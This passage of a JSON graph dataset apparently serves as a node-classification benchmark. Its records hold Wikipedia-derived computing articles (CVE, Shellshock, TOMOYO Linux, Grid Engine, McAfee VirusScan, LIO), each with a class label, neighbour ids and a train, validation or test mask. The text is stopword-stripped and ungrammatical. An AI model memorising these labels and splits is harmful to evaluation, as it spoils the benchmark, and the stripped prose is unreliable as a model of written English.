divx xvid mkv android porting due many owners phone disliking bada software many people worked porting popular android o.s wave 2 ported versions known froyo gingerbread ice cream sandwich jelly bean kitkat however still developed features gps may limited function intended samsung site reviews support forums",
    "neighbors": [
      10080,
      196,
      2852,
      487,
      9964,
      7983,
      1776,
      6608,
      2259,
      8794,
      6391,
      10393,
      6266,
      1083
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2708,
    "label": 3,
    "text": "RISC_Single_Chip:risc single chip risc single chip rsc single-chip microprocessor developed fabricated international business machines ibm rsc feature-reduced single-chip implementation power1 multi-chip central processing unit cpu implemented power instruction set architecture isa used entry-level workstation models ibm rs/6000 family model 220 230 rsc operated frequencies 33 45 mhz three execution units fixed point unit floating point unit branch processor 8 kb unified instruction data cache like power1 memory controller i/o tightly integrated functional units responsible functions memory interface unit sequencer unit residing die processor rsc contains nine functional units fixed-point execution unit fxu floating-point execution unit fpu memory management unit mmu memory interface unit miu sequencer unit common on-chip processor unit cop instruction fetch unit instruction queue dispatch unit fixed point unit executes integer instructions generates addresses load store operations portions branch instructions three-stage pipeline consisting decode execute writeback stages instructions require several cycles execute stage completed floating point unit executes floating point instructions unlike power1 rsc register renaming capability due limited die area unit must fit save die area floating point multiply-add array 32 bits wide perform 64-bit double-precision operations operands broken two instruction passes twice multiply-add array floating point pipeline consists four stages decode multiply add writeback rsc 8 kb unified cache instead separate instruction large data caches like power1 unified cache two-way set associative uses store-through policy reload store miss least recently used lru replacement policy cache line size 64 bytes cache line sectored four quadwords 16 bytes quadword given valid bit cache directory cycle four words read two doublewords written memory data bus 72 bits wide 64 bits used data path 8 bits used error correcting code ecc memory interface unit manages bus performs ecc checks data coming processor ecc logic capable correcting single-bit errors compared power1 rsc memory data bus narrower uses industry standard simms instead custom memory cards rsc contained approximately one million transistors 14.9 mm 15.2 mm 226.48 mm die fabricated ibm complementary metal-oxide semiconductor cmos process minimal feature size 0.8 μm three levels wiring packaged 36 mm 36 mm ceramic pin grid array module 201 signal pins required 3.6 volt power supply consumed 4 watts operation 33 mhz",
    "neighbors": [
      3457,
      3493,
      3470,
      5358,
      1776,
      4465,
      10734,
      5235,
      1461,
      3323,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 2709,
    "label": 4,
    "text": "Common_Vulnerabilities_and_Exposures:common vulnerabilities exposures common vulnerabilities exposures cve system provides reference-method publicly known information-security vulnerabilities exposures national cybersecurity ffrdc operated mitre corporation maintains system funding national cyber security division united states department homeland security security content automation protocol uses cve cve ids listed mitre system well us national vulnerability database mitre corporation documentation defines cve identifiers also called cve names cve numbers cve-ids cves unique common identifiers publicly known information-security vulnerabilities publicly released software packages historically cve identifiers status candidate can- could promoted entries cve- however practice ended time ago identifiers assigned cves assignment cve number guarantee become official cve entry e.g cve may improperly assigned issue security vulnerability duplicates existing entry cves assigned cve numbering authority cna three primary types cve number assignments investigating vulnerability potential vulnerability helps acquire cve number early cve numbers may appear mitre nvd cve databases time days weeks months potentially years due issues embargoed cve number assigned issue made public cases entry researched written mitre due resource issues benefit early cve candidacy future correspondence refer cve number information getting cve identifiers issues open source projects available red hat cves software publicly released include betas pre-release versions widely used commercial software included publicly released category however custom-built software distributed would generally given cve additionally services e.g web-based email provider assigned cves vulnerabilities found service e.g xss vulnerability unless issue exists underlying software product publicly distributed cve database contains several fields standardized text description issue one common entry means entry number reserved mitre issue cna reserved number case cna requests block cve numbers advance e.g red hat currently requests cves blocks 500 cve number marked reserved even though cve may assigned cna time cve assigned mitre made aware i.e. embargo passes issue made public mitre researched issue written description entries show **reserved ** list urls information date entry created cves assigned directly mitre date mitre created cve entry cves assigned cnas e.g microsoft oracle hp red hat etc also date created mitre cna case cna requests block cve numbers advance e.g red hat currently requests cves blocks 500 entry date cve assigned cna following fields previously used older cve records longer used order support cve id beyond cve-year-9999 aka cve10k problem change made cve syntax 2014 took effect jan 13 2015 new cve-id syntax variable length includes cve prefix year arbitrary digits note variable length arbitrary digits begin four 4 fixed digits expand arbitrary digits needed calendar year example cve-yyyy-nnnn needed cve-yyyy-nnnnn cve-yyyy-nnnnnn also means changes needed previously assigned cve-ids include minimum 4 digits cve attempts assign one cve per security issue however many cases would lead extremely large number cves e.g several dozen cross-site scripting vulnerabilities found php application due lack use codice_1 insecure creation files codice_2 deal guidelines subject change cover splitting merging issues distinct cve numbers general guideline one first consider issues merged issues split type vulnerability e.g buffer overflow vs. stack overflow software version affected e.g one issue affects version 1.3.4 2.5.4 affects 1.3.4 2.5.8 would split reporter issue e.g alice reports one issue bob reports another issue issues would split separate cve numbers another example alice reports /tmp file creation vulnerability version 1.2.3 earlier examplesoft web browser addition issue several codice_2 file creation issues found cases may considered two reporters thus split two separate cves alice works examplesoft examplesoft internal team finds rest may merge'ed single cve conversely issues merged e.g bob finds 145 xss vulnerabilities exampleplugin exampleframework regardless versions affected may merged single cve mitre cve database searched cve list search nvd cve database searched search cve cce vulnerability database cve identifiers intended use respect identifying vulnerabilities common vulnerabilities exposures cve dictionary common names i.e. cve identifiers publicly known information security vulnerabilities cve ’ common identifiers make easier share data across separate network security databases tools provide baseline evaluating coverage organization ’ security tools report one security tools incorporates cve identifiers may quickly accurately access fix information one separate cve-compatible databases remediate problem users assigned cve identifier vulnerability encouraged ensure place identifier related security reports web pages emails",
    "neighbors": [
      1024,
      5636,
      10633,
      2187,
      6797,
      2446,
      4240,
      1683,
      10132,
      6550,
      6423,
      1688,
      10264,
      2717,
      5024,
      1954,
      4644,
      7337,
      7467,
      4268,
      3503,
      9904,
      7601,
      11567,
      9525,
      8886,
      10747,
      7736,
      7739,
      575,
      1474,
      10622,
      1608,
      3657,
      3021,
      11213,
      6735,
      4689,
      8787,
      11221,
      3286,
      11605,
      1369,
      7515,
      4062,
      8928,
      3299,
      2409,
      8042,
      9455,
      1140,
      635,
      5373,
      2558,
      2815
    ],
    "mask": "None"
  },
  {
    "node_id": 2710,
    "label": 7,
    "text": "Oracle_Grid_Engine:oracle grid engine oracle grid engine previously known sun grid engine sge codine computing distributed networked environments grd global resource director grid computing computer cluster software system otherwise known batch-queuing system acquired part purchase gridware improved supported sun microsystems later oracle open source versions multiple commercial versions technology initially sun later oracle univa corporation october 22 2013 univa announced acquired intellectual property trademarks grid engine technology univa take support.. univa since evolved grid engine technology e.g improving scalability demonstrated 1 million core cluster aws announced june 24 2018 original grid engine open-source project website closed 2010 versions technology still available original sun industry standards source license projects forked original project code known son grid engine open grid scheduler univa grid engine grid engine typically used computer farm high-performance computing hpc cluster responsible accepting scheduling dispatching managing remote distributed execution large numbers standalone parallel interactive user jobs also manages schedules allocation distributed resources processors memory disk space software licenses grid engine used foundation sun grid utility computing system made available internet united states 2006 later becoming available many countries early version public cloud computing facility predating amazon aws instance feature sets date last sun releases 2009 earlier current feature information found web sites open source forks univa grid engine features 6.2 features sge include grid engine runs multiple platforms including aix bsd freebsd netbsd openbsd hp-ux irix linux mac os x solaris super-ux tru64 windows via sfu interix sua microsoft windows services unix execution hosts z/os progress typical grid engine cluster consists master host one execution hosts multiple shadow masters also configured hot spares take role master original master host crashes univa providing commercial support training univa grid engine oracle grid engine description historic options sun provided support contracts commercial version grid engine unix platforms windows professional services consulting training support provided sun partners sun partners georgetown university deliver grid engine administration classes bioteam runs short sge training workshops 1 2 days long users obtained community support grid engine mailing lists grid engine workshops held 2002 2003 2007 2009 2012 regensburg germany contains historic information recent deployment information specifically regarding commercial users available univa notable deployments sge include 2000 sun acquired gridware privately owned commercial vendor advanced computing resource management software offices san jose calif. regensburg germany later year sun offered free version gridware solaris linux renamed product sun grid engine 2001 sun made source code available adopted open source development model ports mac os x *bsd contributed non-sun open source developers 2010 purchase sun oracle grid engine 6.2 update 6 source code included binaries changes put back project source repository response grid engine community started open grid scheduler project continue develop maintain free implementation grid engine january 18 2011 announced univa recruited several principal engineers former sun grid engine team univa would developing forked version grid engine newly announced univa grid engine include commercial support would compete official version oracle grid engine oct 22 2013 univa announced acquired intellectual property trademarks pertaining grid engine technology univa take support oracle grid engine customers contains historic information products solutions longer available number sge add-ons available",
    "neighbors": [
      3328,
      7682,
      3331,
      8447,
      9602,
      8582,
      9731,
      1801,
      4235,
      6797,
      1806,
      1809,
      1304,
      9343,
      7072,
      8994,
      1316,
      10789,
      3753,
      1707,
      5677,
      3247,
      7983,
      6322,
      4020,
      2871,
      823,
      11129,
      1594,
      2236,
      7104,
      9665,
      6338,
      5956,
      10436,
      8007,
      1480,
      6856,
      330,
      2895,
      7248,
      6993,
      9040,
      597,
      3285,
      6615,
      10200,
      10327,
      11353,
      2651,
      8030,
      5471,
      4960,
      4194,
      9955,
      11363,
      10597,
      105,
      7018,
      11626,
      5612,
      7148,
      7022,
      5872,
      5233,
      11506,
      7935,
      8179,
      9333,
      631,
      2168,
      3449,
      8702,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 2711,
    "label": 2,
    "text": "Tomoyo_Linux:tomoyo linux tomoyo linux stylised tomoyo linux linux kernel security module implements mandatory access control mac tomoyo linux mac implementation linux used increase security system also useful purely systems analysis tool launched march 2003 sponsored ntt data corporation march 2012 tomoyo linux focuses system behaviour tomoyo linux allows process declare behaviours resources needed achieve purpose protection enabled tomoyo linux restricts process behaviours resources allowed administrator main features tomoyo linux include tomoyo merged linux kernel mainline version 2.6.30 2009 june 10 currently one four standard linux security modules lsm along selinux apparmor smack tomoyo linux project started patch linux kernel provide mac porting tomoyo linux mainline linux kernel required introduction hooks lsm designed developed specifically support selinux label-based approach however hooks needed integrate remaining mac functionality tomoyo linux consequently project following two parallel development lines",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8438,
      8439,
      2809,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 2712,
    "label": 4,
    "text": "Robert_E._Drake:robert e. drake robert edwin drake october 11 1923 – january 12 2006 american intelligence official deputy director national security agency 1978 1980 time highest ranking civilian agency joined armed services security agency 1949 eventually newly created national security agency 1952 nsa served overseas offices europe southeast asia hawaii also served position chief soviet east european analytic group deputy director operations retiring nsa 1978 returned independent consulting work intelligence work received national intelligence distinguished service medal national security agency meritorious exceptional civilian service awards defense department distinguished civilian service award central intelligence agency distinguished service medal alumnus carleton college minnesota george washington university national war college died heart failure 2006 aged 82",
    "neighbors": [
      289,
      4898,
      7137,
      10305,
      11302,
      327,
      6343,
      266,
      6668,
      365,
      9357,
      4719,
      7887,
      2897,
      1714,
      10832,
      4566,
      6749
    ],
    "mask": "None"
  },
  {
    "node_id": 2713,
    "label": 2,
    "text": "RemoteFX:remotefx microsoft remotefx microsoft brand name covers set technologies enhance visual experience microsoft-developed remote display protocol remote desktop protocol rdp remotefx first introduced windows server 2008 r2 sp1 based intellectual property microsoft acquired continued develop since acquiring calista technologies part overall remote desktop services workload remotefx components introduced windows server 2008 r2 sp1 include windows server 2012 following components added remotefx addition following components updated windows server 2016 rdp 10 following components added remotefx remotefx media streaming replaced multi media redirection mmr note mmr completely removed rdp 10 given remotefx media streaming works types video content whereas mmr worked windows server 2008 r2 remotefx codec could leveraged session hosting remote desktop session hosts vdi scenarios remote desktop virtualization hosts remotefx vgpu remotefx usb redirection features could used vdi scenarios remote desktop virtualization hosts windows 10 version 1511 brings remotefx client hyper-v removing dependency remote desktop services role generation 2 vms windows server 2012 r2 support remotefx windows server 2016 added support windows server 2012 features remotefx exception vgpu used without physical gpu present server gpu present server synthetic software-emulated gpu used render content gpu present server used hardware accelerate graphics via remotefx vgpu feature remotefx vgpu following requirements windows server 2008 r2 sp1 tested twelve virtual machines per gpu total twenty-four virtual machines two physical gpus although gpu meeting requirements capable using remotefx windows server catalog carries additional qualification define requirements server-qualified gpus specifications define gpus configuration requirements provide vm performance targets graphics cards meet typically professional workstation products ati/amd firepro v5800 v5900 v7800 v7900 v8800 v9800 nvidia quadro 2000 3800 4000 4800 5000 5800 6000 quadro fx 2800m 880m quadroplex 7000 tesla m2070q servers running remotefx vgpu need accommodate graphics cards either larger power supplies pcie slots alternatively connect existing servers external pcie expansion chassis",
    "neighbors": [
      4505,
      10747,
      9655,
      2943
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2714,
    "label": 4,
    "text": "NSA_Playset:nsa playset nsa playset open source project inspired nsa ant catalog create accessible easy use tools security researchers surveillance tools recreated off-the-shelf open-source hardware software thus far nsa playset consists fourteen items code instructions found online project ’ homepage initial nsa ant catalog leak published der spiegel 2013 michael ossman founder great scott gadgets gave shout security researchers start working tools mentioned catalog recreate name nsa playset came originally dean pierce also contributor twilightvegetable gsm nsa playset anyone invited join contribute device requisites addition nsa playset similar already existing nsa ant project ease use silly name based original tool ’ name silly name requisite rule michael ossman came example given project ’ website example project similar foxacid maybe could call coyotemeth ease use part stems also nsa playset motto 10 year old ’ n't count",
    "neighbors": [
      3984,
      8625,
      8978,
      11108
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2715,
    "label": 0,
    "text": "WYSIWYM_(interaction_technique):wysiwym interaction technique see meant wysiwym text editing interaction technique emerged two projects university brighton allows users create abstract knowledge representations required semantic web using natural language interface natural language understanding nlu technology employed instead natural language generation nlg used highly interactive manner text editor accepts repeated refinement selected span text becomes increasingly less vacuous authored semantics using mouse text property held evolving text refined set options derived nlg built-in ontology invisible representation semantic knowledge created used multilingual document generation formal knowledge formation task requires formally specified information two projects brighton worked field conceptual authoring lay foundation research development semantic web authoring tool swat tool explored means developing knowledge base without prior experience controlled natural language tools",
    "neighbors": [
      2440,
      10452
    ],
    "mask": "Train"
  },
  {
    "node_id": 2716,
    "label": 4,
    "text": "DaveGrohl:davegrohl davegrohl brute-force password cracker macos originally created 2010 password hash extractor since evolved standalone distributed password cracker supports standard mac os x user password hashes md4 sha-512 pbkdf2 used since os x lion also extract formatted popular password crackers like john ripper latest stable release designed specifically mac os x lion mountain lion davegrohl supports dictionary incremental attacks dictionary attack scan number pre-defined wordlists incremental attack count character set finds password distributed mode uses bonjour find server nodes local network therefore requires configuration",
    "neighbors": [
      3937,
      7426,
      8513,
      4580,
      6916,
      7556,
      7557,
      4457,
      4140,
      7983,
      8787,
      10135,
      8827,
      733
    ],
    "mask": "Test"
  },
  {
    "node_id": 2717,
    "label": 4,
    "text": "Shellshock_(software_bug):shellshock software bug shellshock also known bashdoor family security bugs unix bash shell first disclosed 24 september 2014 shellshock could enable attacker cause bash execute arbitrary commands gain unauthorized access many internet-facing services web servers use bash process requests 12 september 2014 stéphane chazelas informed bash maintainer chet ramey discovery original bug called bashdoor working security experts developed patch fix issue assigned vulnerability identifier existence bug announced public bash updates fix ready distribution bug chazelas discovered caused bash unintentionally execute commands commands concatenated end function definitions stored values environment variables within days publication variety related vulnerabilities discovered ramey addressed series patches attackers exploited shellshock within hours initial disclosure creating botnets compromised computers perform distributed denial-of-service attacks vulnerability scanning security companies recorded millions attacks probes related bug days following disclosure potential compromise millions unpatched systems shellshock compared heartbleed bug severity shellshock bug affects bash program various unix-based systems use execute command lines command scripts often installed system default command-line interface analysis source code history bash shows bugs existed since bash version 1.03 released september 1989 shellshock privilege escalation vulnerability offers way users system execute commands unavailable happens bash function export feature whereby command scripts created one running instance bash shared subordinate instances feature implemented encoding scripts within table shared instances known environment variable list new instance bash scans table encoded scripts assembles one command defines script new instance executes command new instance assumes scripts found list come another instance verify verify command built properly formed script definition therefore attacker execute arbitrary commands system exploit bugs may exist bash command interpreter attacker way manipulate environment variable list cause bash run presence bug announced public bash updates fix ready distribution though took time computers updated close potential security issue within hour announcement bash vulnerability reports machines compromised bug 25 september 2014 botnets based computers compromised exploits based bug used attackers distributed denial-of-service ddos attacks vulnerability scanning kaspersky labs reported machines compromised attack dubbed thanks-rob conducting ddos attacks three targets identify 26 september 2014 shellshock-related botnet dubbed wopbot reported used ddos attack akamai technologies scan united states department defense 26 september security firm incapsula noted 17,400 attacks 1,800 web domains originating 400 unique ip addresses previous 24 hours 55 attacks coming china united states 30 september website performance firm cloudflare said tracking approximately 1.5 million attacks probes per day related bug 6 october widely reported yahoo servers compromised attack related shellshock issue yet next day denied shellshock specifically allowed attacks maintainer bash warned first discovery bug fix followed soon companies distributors informed matter publicly disclosed cve identifier cve-2014-6271 however release patch subsequent reports different yet related vulnerabilities 26 september 2014 two open-source contributors david a. wheeler norihiro tanaka noted additional issues even patching systems using recently available patches email addressed oss-sec list bash bug list wheeler wrote patch continues 'whack-a-mole job fixing parsing errors began first patch bash parser certain many many many vulnerabilities however rather general reasoning without actually presenting exploitation examples implied restricting bash functionality effect bash scripts wo n't work even intended harm users 27 september 2014 michał zalewski google inc. announced discovery bash vulnerabilities one based upon fact bash typically compiled without address space layout randomization 1 october zalewski released details final bugs confirmed patch florian weimer red hat posted 25 september indeed prevent done using fuzzing technique aid software utility known american fuzzy lop original form vulnerability involves specially crafted environment variable containing exported function definition followed arbitrary commands bash incorrectly executes trailing commands imports function vulnerability tested following command systems affected vulnerability commands display word vulnerable result bash executing command echo vulnerable embedded specially crafted environment variable named x discovered michał zalewski vulnerability relates parsing function definitions environment variables bash cause segfault also discovered michał zalewski relates parsing function definitions environment variables bash day original vulnerability published tavis ormandy discovered related bug demonstrated following code vulnerable system would execute command date unintentionally example system patch cve-2014-6271 cve-2014-7169 system displays syntax errors notifying user cve-2014-6271 prevented still writes file named 'echo working directory containing result 'date call system patched cve-2014-6271 cve-2014-7169 simply echo word date file echo created shown florian weimer todd sabin found bug relates out-of-bounds memory access error bash parser code example vulnerability leverages use multiple « eof declarations nested documents vulnerable system echo text cve-2014-7186 vulnerable redir_stack also found florian weimer off-by-one error bash parser code allowing out-of-bounds memory access example vulnerability leverages use multiple done declarations vulnerable system echo text cve-2014-7187 vulnerable word_lineno test requires shell supports brace expansion 24 september 2014 bash maintainer chet ramey provided patch version bash43-025 bash 4.3 addressing cve-2014-6271 already packaged distribution maintainers 24 september bash43-026 followed addressing cve-2014-7169 cve-2014-7186 discovered florian weimer red hat posted patch code unofficially 25 september ramey incorporated bash bash43-027.—these patches provided code helpful know compile rebuild new bash binary executable file patch file remaining source code files next day red hat officially presented according updates red hat enterprise linux another day fedora 21 canonical ltd. presented updates ubuntu long term support versions saturday 27 september sunday updates suse linux enterprise following monday tuesday end month mac os x updates appeared 1 october 2014 michał zalewski google inc. finally stated weimer code bash43-027 fixed first three bugs even remaining three published bash43-027 including two discoveries means earlier distribution updates updates required cover six issues also covered ibm hardware management console",
    "neighbors": [
      1024,
      5636,
      6153,
      4117,
      8726,
      535,
      8735,
      9761,
      2084,
      4133,
      4644,
      5682,
      5176,
      1608,
      3657,
      8779,
      10333,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      7809,
      5764,
      2187,
      4240,
      2709,
      1688,
      2717,
      7325,
      9375,
      8867,
      7847,
      9904,
      9395,
      8886,
      10437,
      3789,
      5325,
      4304,
      2262,
      4314,
      9435,
      4830,
      3807,
      225,
      5349,
      1254,
      10477,
      9455,
      9460,
      7418,
      2815,
      3843,
      260,
      10502,
      4883,
      10003,
      3367,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      865,
      2409,
      2931,
      3956,
      5492,
      9082,
      10631,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      2996,
      2485,
      441,
      1979,
      4027,
      5563,
      9664,
      1474,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      8170,
      2542,
      8176,
      507,
      3581
    ],
    "mask": "None"
  },
  {
    "node_id": 2718,
    "label": 3,
    "text": "Toobin':toobin' toobin nowiki /nowiki atari games video game originally released arcade game 1988 based recreational sport tubing later ported systems nes commodore amiga commodore 64 msx game boy color game player assumes control main characters bif jet guiding many winding rivers innertube game included part midway arcade treasures arcade party pak given remixed soundtrack also included 2012 compilation midway arcade origins game one 23 arcade games included midway arcade level pack lego dimensions unlocked using hidden arcade dock level follow lego brick road player competes river race computer another player player score increases swishing gates hitting characters cans collecting hidden letters spell toobin collecting treasures players try avoid obstacles pushing power-ups allow players carry multiple cans combinations gates increase score multiplier game three different classes five rivers total 15",
    "neighbors": [
      3020,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2719,
    "label": 3,
    "text": "Excavator_(microarchitecture):excavator microarchitecture amd excavator family 15h microarchitecture developed amd succeed steamroller family 15h use amd apu processors normal cpus october 12 2011 amd revealed excavator code name fourth-generation bulldozer-derived core excavator-based apu mainstream applications called carrizo released 2015 carrizo apu designed hsa 1.0 compliant excavator-based apu cpu variant named toronto server enterprise markets also produced excavator final revision bulldozer family two new microarchitectures replacing excavator year later excavator succeeded x86-64 zen architecture early 2017 excavator added hardware support new instructions avx2 bmi2 rdrand excavator designed using high density aka thin libraries normally used gpus reduce electric energy consumption die size delivering 30 percent increase efficient energy use excavator process 15 instructions per clock compared amd previous core steamroller three apu lines announced released plans steamroller 3rd gen bulldozer excavator 4th gen bulldozer architectures high-end desktop platforms excavator cpu desktop announced 2nd feb 2016 named athlon x4 845.in 2017 three desktop cpus athlon x4 9x0 launched come socket am4 tdp 65w fact apus graphics cores disabled amd opteron roadmaps 2015 show excavator-based toronto apu toronto cpu intended 1 processor 1p cluster applications",
    "neighbors": [
      3586,
      8322,
      5380,
      9092,
      9475,
      6151,
      8327,
      10375,
      5645,
      398,
      9369,
      8090,
      7963,
      9500,
      9122,
      10658,
      5541,
      11047,
      2088,
      2094,
      11183,
      6705,
      9400,
      10620,
      833,
      6978,
      7234,
      9541,
      11080,
      2764,
      7247,
      9551,
      5329,
      7122,
      9427,
      9428,
      473,
      3294,
      5859,
      7783,
      5356,
      1005,
      9582,
      9964,
      1137,
      499,
      2549,
      630,
      11130,
      4603,
      6268,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 2720,
    "label": 7,
    "text": "Cloud_computing_architecture:cloud computing architecture cloud computing architecture refers components subcomponents required cloud computing components typically consist front end platform fat client thin client mobile device back end platforms servers storage cloud based delivery network internet intranet intercloud combined components make cloud computing architecture cloud computing architectures consist front-end platforms called clients cloud clients clients servers fat thick clients thin clients zero clients tablets mobile devices client platforms interact cloud data storage via application middleware via web browser virtual session zero ultra-thin client initializes network gather required configuration files tell os binaries stored entire zero client device runs via network creates single point failure network goes device rendered useless online network storage data stored accessible multiple clients cloud storage generally deployed following configurations public cloud private cloud community cloud combination three also known hybrid cloud order effective cloud storage needs agile flexible scalable multi-tenancy secure software-as-a-service saas service-model involves cloud provider installing maintaining software cloud users running software cloud internet intranet users client machines require installation application-specific software since cloud applications run cloud saas scalable system administrators may load applications several servers past customer would purchase load copy application servers saas customer access application without installing software locally saas typically involves monthly annual fee software service provides equivalent installed applications traditional non-cloud computing delivery applications software service four common approaches flex tenancy considered user adaptive saas paradigm designated multi-input four way manifold models systems based simplified encryption methods target listed data sequences multiple passes simplicity concept makes flex tenancy saas popular among without informatics processing experience basic maintenance custodial staff franchise businesses development service web based community shared development tools equivalent locally installed development tools traditional non-cloud computing delivery development tools data service web based design construct cloud data accessed defined api layer daas services often considered specialized subset software service saas offering platform service cloud computing service provides users application platforms databases service equivalent middleware traditional non-cloud computing delivery application platforms databases infrastructure service taking physical hardware going completely virtual e.g servers networks storage system management existing cloud equivalent infrastructure hardware traditional non-cloud computing method running cloud words businesses pay fee monthly annually run virtual servers networks storage cloud mitigate need data center heating cooling maintaining hardware local level generally cloud network layer offer",
    "neighbors": [
      4194,
      10782,
      2504,
      2795,
      4429,
      5202,
      467,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 2721,
    "label": 4,
    "text": "McAfee_VirusScan:mcafee virusscan mcafee virusscan antivirus program created maintained mcafee inc. formerly known intel security network associates prior available standalone package included mcafee livesafe mcafee antivirus plus mcafee total protection additionally bskyb mcafee previously produced sky broadband branded version virusscan offered free sky digital customers upon broadband modem installation mcafee livesafe integrates antivirus firewall anti-spyware/anti-ransomware capabilities mcafee also produces enterprise-level product named virusscan enterprise mcafee designed use larger networks designed make management antivirus software multiple computers easier unlike home-user edition enterprise edition consists client application networked computers server application system installs updates configures settings client programs clients controlled using included epolicy orchestrator epo unified console control virusscan mcafee products november 2008 mcafee announced virusscan mac 8.6 earlier versions used name virex developed hjc software key changes virusscan 8.6 included leopard compatibility universal binary package ran intel powerpc-based macs access scanning apple mail support tests virus bulletin additional independent consumer-organizations mcafee virusscan fared well frequently failing detect common viruses review virusscan 2006 cnet criticized product due pronounced performance hits two three real-world performance tests users reviewing product reported encountering technical problems older versions virusscan engine use available cpu cycles reviewers described customer support mcafee products lacking support staff slow respond unable answer many questions april 21 2010 beginning approximately 2 pm gmt erroneous virus definition file update mcafee affected millions computers worldwide running windows xp service pack 3 update resulted removal windows system file codice_1 machines causing machines lose network access cases enter reboot loop mcafee rectified removing replacing faulty dat file version 5958 emergency dat file version 5959 posted fix affected machines consumer knowledgebase august 2012 update mcafee antivirus caused protection become turned users lose internet connections mcafee criticized notifying users promptly issues learned mcafee though well-known continues mixed reviews industry sources company prepared 2015 release series address current market conditions repositioning includes voice facial recognition authentication cloud-based data security",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1417,
      3981,
      3342,
      6797,
      10637,
      4374,
      10392,
      3739,
      1052,
      156,
      6431,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      3885,
      6699,
      7983,
      8615,
      1970,
      4403,
      5887,
      6834,
      9523,
      823,
      10166,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      5069,
      10574,
      10708,
      2005,
      8024,
      8998,
      1242,
      2907,
      8668,
      11225,
      2654,
      9055,
      9569,
      3941,
      11622,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      3962,
      4475,
      9341,
      127
    ],
    "mask": "Train"
  },
  {
    "node_id": 2722,
    "label": 3,
    "text": "Philips_NMS-1205:philips nms-1205 br philips nms-1205 msx audio cartridge without bios using yamaha y8950 chip released 1984 nms-1205 sold europe msx personal computer cartridge featured fm sound synthesizer sound sampler adpcm 32 kb sample ram midi interface audio midi i/o connectors also built software music-box call musicbox fm sound synthesizer opl fm operator type-l compatible sound sampler 32kb sampleram adpcm unit midi interface in/out/thru built software music-box call musicbox note sold europe",
    "neighbors": [
      1515,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2723,
    "label": 2,
    "text": "LIO_(SCSI_target):lio scsi target computing linux-io lio target open-source implementation scsi target become standard one included linux kernel internally lio initiate sessions instead provides one logical unit numbers luns waits scsi commands scsi initiator performs required input/output data transfers lio supports common storage fabrics including fcoe fibre channel ieee 1394 iscsi iscsi extensions rdma iser scsi rdma protocol srp usb included linux distributions native support lio qemu/kvm libvirt openstack makes lio also storage option cloud deployments lio maintained datera inc. silicon valley vendor storage systems software january 15 2011 lio scsi target engine merged linux kernel mainline kernel version 2.6.38 released march 14 2011 additional fabric modules merged subsequent linux releases competing generic scsi target module linux scst narrower purpose providing linux iscsi target older iet iscsi enterprise target stgt scsi target framework modules also enjoy industry support scsi standard provides extensible semantic abstraction computer data storage devices become lingua franca data storage systems scsi t10 standards define commands protocols scsi command processor sent scsi cdbs electrical optical interfaces various implementations scsi initiator endpoint initiates scsi session scsi target endpoint waits initiator commands executes required i/o data transfers scsi target usually exports one luns initiators operate lio linux scsi target implements generic scsi target provides remote access data storage device types prevalent storage fabrics protocols lio neither directly accesses data directly communicate applications lio provides highly efficient fabric-independent fabric-transparent abstraction semantics numerous data storage device types lio implements modular extensible architecture around versatile highly efficient parallelized scsi command processing engine scsi target engine implements semantics scsi target lio scsi target engine independent specific fabric modules backstore types thus lio supports mixing matching number fabrics backstores time lio scsi target engine implements comprehensive spc-3/spc-4 feature set support high-end features including scsi-3/scsi-4 persistent reservations prs scsi-4 asymmetric logical unit assignment alua vmware vsphere apis array integration vaai t10 dif etc lio configurable via configfs-based kernel api managed via command-line interface api targetcli concept scsi target n't narrowly restricted physical devices scsi bus instead provides generalized model receivers logical scsi fabric includes scsi sessions across interconnects physical scsi bus conceptually scsi target provides generic block storage service server scenario backstores provide scsi target generalized access data storage devices importing via corresponding device drivers backstores n't need physical scsi devices important backstore media types result lio provides generalized model export block storage fabric modules implement frontend scsi target encapsulating abstracting properties various supported interconnect following fabric modules available fibre channel ethernet fcoe fabric module allows transport fibre channel protocol fcp traffic across lossless ethernet networks specification supported large number network storage vendors part technical committee t11 fc-bb-5 standard lio supports standard ethernet nics fcoe fabric module contributed cisco intel released linux 3.0 july 21 2011 fibre channel high-speed network technology primarily used storage networking standardized technical committee t11 international committee information technology standards incits qlogic fibre channel fabric module supports 4- 8-gigabit speeds following hbas fibre channel fabric module low-level driver lld released linux 3.5 july 21 2012 linux 3.9 following qlogic hbas cnas also supported makes lio first open source target support 16-gigabit fibre channel firewire sbp-2 fabric module enables linux export local storage devices via ieee 1394 systems mount ordinary ieee 1394 storage device ieee 1394 serial bus interface standard high-speed communications isochronous real-time data transfer developed apple firewire late 1980s early 